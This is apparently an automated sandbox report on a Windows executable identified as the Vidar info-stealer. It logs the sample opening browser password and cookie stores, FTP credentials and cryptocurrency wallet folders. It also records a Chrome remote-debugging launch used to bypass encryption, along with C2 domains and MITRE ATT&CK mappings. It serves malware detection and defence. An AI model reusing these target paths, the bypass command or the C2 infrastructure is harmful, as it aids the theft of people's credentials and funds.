              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore-backups\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\crashes\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\default\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\db\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ca4gppea.default\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\security_state\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\to-be-removed\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\bookmarkbackups\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\tmp\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\temporary\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\minidumps\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\crashes\events\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\events\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
              Source: Yara matchFile source: 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: BHgwhz3lGN.exe PID: 7428, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Attempt to bypass Chrome Application-Bound Encryption
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              Yara detected Vidar stealer
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 00000000.00000003.1522441957.00000000004E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1483165863.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1470034888.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1497511197.00000000004E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: BHgwhz3lGN.exe PID: 7428, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              Create Account              		11
              Process Injection              		1
              Masquerading              		2
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		21
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Registry Run Keys / Startup Folder              		1
              Registry Run Keys / Startup Folder              		1
              Virtualization/Sandbox Evasion              		1
              Credentials in Registry              		11
              Query Registry              		Remote Desktop Protocol4
              Data from Local System              		1
              Remote Access Software              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Process Injection              		Security Account Manager1
              Security Software Discovery              		SMB/Windows Admin SharesData from Network Shared Drive2
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              Virtualization/Sandbox Evasion              		Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets2
              Process Discovery              		SSHKeylogging14
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials1
              Account Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              System Owner/User Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem4
              File and Directory Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow34
              System Information Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582430 Sample: BHgwhz3lGN.exe Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 55 sdoout.lol 2->55 57 t.me 2->57 65 Suricata IDS alerts for network traffic 2->65 67 Found malware configuration 2->67 69 Antivirus detection for URL or domain 2->69 71 6 other signatures 2->71 8 BHgwhz3lGN.exe 93 2->8         started        12 msedge.exe 68 640 2->12         started        signatures3 process4 dnsIp5 59 sdoout.lol 116.203.14.4, 443, 49707, 49708 HETZNER-ASDE Germany 8->59 61 t.me 149.154.167.99, 443, 49706 TELEGRAMRU United Kingdom 8->61 63 127.0.0.1 unknown unknown 8->63 73 Attempt to bypass Chrome Application-Bound Encryption 8->73 75 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 8->75 77 Found many strings related to Crypto-Wallets (likely being stolen) 8->77 79 4 other signatures 8->79 14 msedge.exe 2 11 8->14         started        17 chrome.exe 8 8->17         started        20 cmd.exe 8->20         started        22 msedge.exe 12->22         started        24 msedge.exe 12->24         started        26 msedge.exe 12->26         started        28 msedge.exe 12->28         started        signatures6 process7 dnsIp8 81 Monitors registry run keys for changes 14->81 30 msedge.exe 14->30         started        45 192.168.2.9, 138, 443, 49216 unknown unknown 17->45 47 239.255.255.250 unknown Reserved 17->47 32 chrome.exe 17->32         started        35 conhost.exe 20->35         started        37 timeout.exe 20->37         started        49 20.110.205.119, 443, 53908, 53935 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 22->49 51 20.189.173.8, 443, 53905, 53942 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 22->51 53 18 other IPs or domains 22->53 signatures9 process10 dnsIp11 39 www.google.com 142.250.185.68, 443, 49717, 49718 GOOGLEUS United States 32->39 41 play.google.com 142.250.186.110, 443, 49731, 49738 GOOGLEUS United States 32->41 43 2 other IPs or domains 32->43

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              BHgwhz3lGN.exe34%ReversingLabs
              BHgwhz3lGN.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://sdoout.lolRY0%Avira URL Cloudsafe
              https://sdoout.lolBY0%Avira URL Cloudsafe
              https://sdoout.lol100%Avira URL Cloudmalware
              https://sdoout.lol/pc100%Avira URL Cloudmalware
              https://sdoout.lol/FY100%Avira URL Cloudmalware
              https://sdoout.lolfY-0%Avira URL Cloudsafe
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.0%Avira URL Cloudsafe
              https://sdoout.lol/z100%Avira URL Cloudmalware
              https://sdoout.lolzo0%Avira URL Cloudsafe
              https://sdoout.lol/100%Avira URL Cloudmalware
              https://sdoout.lol/X100%Avira URL Cloudmalware
              https://sdoout.lolro0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              chrome.cloudflare-dns.com
              		172.64.41.3
              		truefalse
                		high
                sdoout.lol
                		116.203.14.4
                		truetrue
                  		unknown
                  plus.l.google.com
                  		216.58.206.78
                  		truefalse
                    		high
                    play.google.com
                    		142.250.186.110
                    		truefalse
                      		high
                      t.me
                      		149.154.167.99
                      		truefalse
                        		high
                        ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                        		94.245.104.56
                        		truefalse
                          		high
                          sb.scorecardresearch.com
                          		18.244.18.122
                          		truefalse
                            		high
                            www.google.com
                            		142.250.185.68
                            		truefalse
                              		high
                              googlehosted.l.googleusercontent.com
                              		172.217.16.193
                              		truefalse
                                		high
                                assets.msn.com
                                		unknown
                                		unknownfalse
                                  		high
                                  c.msn.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    ntp.msn.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      clients2.googleusercontent.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        bzib.nelreports.net
                                        		unknown
                                        		unknownfalse
                                          		high
                                          apis.google.com
                                          		unknown
                                          		unknownfalse
                                            		high
                                            api.msn.com
                                            		unknown
                                            		unknownfalse
                                              		high

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735570536845&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                		high
                                                https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                                                  		high
                                                  https://steamcommunity.com/profiles/76561199811540174false
                                                    		high
                                                    https://play.google.com/log?format=json&hasfast=truefalse
                                                      		high
                                                      https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735570541060&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                        		high
                                                        https://clients2.googleusercontent.com/crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crxfalse
                                                          		high
                                                          https://t.me/w211etfalse
                                                            		high
                                                            https://sdoout.lol/true
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://c.msn.com/c.gif?rnd=1735570536847&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=68ae4f54c4b54ec091b4e816c09ceaa4&activityId=68ae4f54c4b54ec091b4e816c09ceaa4&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=50901D4D6116491A952B6DE789F1FD6E&MUID=0D1D943A7B9D67B72691815F7AEF6664false
                                                              		high
                                                              https://c.msn.com/c.gif?rnd=1735570536847&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=68ae4f54c4b54ec091b4e816c09ceaa4&activityId=68ae4f54c4b54ec091b4e816c09ceaa4&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0false
                                                                		high
                                                                https://sb.scorecardresearch.com/b?rn=1735570536847&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0D1D943A7B9D67B72691815F7AEF6664&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                                  		high

                                                                  URLs from Memory and Binaries

                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                  https://duckduckgo.com/chrome_newtabBHgwhz3lGN.exe, 00000000.00000002.2563696536.0000000003732000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000002.2563122466.0000000003362000.00000004.00000020.00020000.00000000.sdmp, mgd2v3.0.dr, Web Data.10.drfalse
                                                                    		high
                                                                    https://c.msn.com/2cc80dabc69f58b6_1.10.drfalse
                                                                      		high
                                                                      https://duckduckgo.com/ac/?q=BHgwhz3lGN.exe, 00000000.00000002.2563696536.0000000003732000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000002.2563122466.0000000003362000.00000004.00000020.00020000.00000000.sdmp, mgd2v3.0.dr, Web Data.10.drfalse
                                                                        		high
                                                                        http://www.broofa.comchromecache_519.5.drfalse
                                                                          		high
                                                                          https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshorelinebff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drfalse
                                                                            		high
                                                                            https://ntp.msn.com/0000003.log0.10.drfalse
                                                                              		high
                                                                              https://sdoout.lol/pcBHgwhz3lGN.exe, 00000000.00000003.1522441957.00000000004E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              https://ntp.msn.com/_defaultQuotaManager.10.drfalse
                                                                                		high
                                                                                https://www.last.fm/bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drfalse
                                                                                  		high
                                                                                  https://deff.nelreports.net/api/report?cat=msnReporting and NEL.11.drfalse
                                                                                    		high
                                                                                    https://ntp.msn.cn/edge/ntp2cc80dabc69f58b6_1.10.drfalse
                                                                                      		high
                                                                                      https://sb.scorecardresearch.com/2cc80dabc69f58b6_1.10.drfalse
                                                                                        		high
                                                                                        https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1chromecache_516.5.drfalse
                                                                                          		high
                                                                                          https://docs.google.com/manifest.json.10.drfalse
                                                                                            		high
                                                                                            https://www.youtube.combff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drfalse
                                                                                              		high
                                                                                              https://www.instagram.combff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drfalse
                                                                                                		high
                                                                                                https://web.skype.com/?browsername=edge_canary_shorelinebff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drfalse
                                                                                                  		high
                                                                                                  https://drive.google.com/manifest.json.10.drfalse
                                                                                                    		high
                                                                                                    https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drfalse
                                                                                                      		high
                                                                                                      https://sdoout.lol/FYBHgwhz3lGN.exe, 00000000.00000003.1443228945.00000000004E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drfalse
                                                                                                        		high
                                                                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&ctaBHgwhz3lGN.exe, 00000000.00000002.2563122466.000000000331F000.00000004.00000020.00020000.00000000.sdmp, ectjmg.0.drfalse
                                                                                                          		high
                                                                                                          https://www.messenger.combff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drfalse
                                                                                                            		high
                                                                                                            https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedgebff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drfalse
                                                                                                              		high
                                                                                                              https://outlook.office.com/mail/compose?isExtension=truebff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drfalse
                                                                                                                		high
                                                                                                                https://sdoout.lolBHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000003.1470034888.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000003.1497511197.00000000004E3000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000003.1456510564.00000000004E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                		unknown
                                                                                                                https://unitedstates4.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.drfalse
                                                                                                                  		high
                                                                                                                  https://i.y.qq.com/n2/m/index.htmlbff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drfalse
                                                                                                                    		high
                                                                                                                    https://www.deezer.com/bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drfalse
                                                                                                                      		high
                                                                                                                      https://web.telegram.org/bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drfalse
                                                                                                                        		high
                                                                                                                        https://cdnjs.cloudflare.com/ajax/libs/mathjax/offscreendocument_main.js.10.dr, service_worker_bin_prod.js.10.drfalse
                                                                                                                          		high
                                                                                                                          https://drive-daily-2.corp.google.com/manifest.json.10.drfalse
                                                                                                                            		high
                                                                                                                            https://drive-daily-4.corp.google.com/manifest.json.10.drfalse
                                                                                                                              		high
                                                                                                                              https://vibe.naver.com/todaybff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drfalse
                                                                                                                                		high
                                                                                                                                https://srtb.msn.com/2cc80dabc69f58b6_1.10.drfalse
                                                                                                                                  		high
                                                                                                                                  https://unitedstates1.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.drfalse
                                                                                                                                    		high
                                                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BHgwhz3lGN.exe, 00000000.00000002.2563696536.0000000003732000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000002.2563122466.0000000003362000.00000004.00000020.00020000.00000000.sdmp, mgd2v3.0.dr, Web Data.10.drfalse
                                                                                                                                      		high
                                                                                                                                      https://assets.msn.comffedd3aa-5869-47ed-b24d-bb1c4fcf1e9f.tmp.11.dr, c5f29bf0-b74e-48bc-a110-aca9fb24b53f.tmp.11.drfalse
                                                                                                                                        		high
                                                                                                                                        https://www.ecosia.org/newtab/BHgwhz3lGN.exe, 00000000.00000002.2563122466.0000000003362000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://drive-daily-1.corp.google.com/manifest.json.10.drfalse
                                                                                                                                            		high
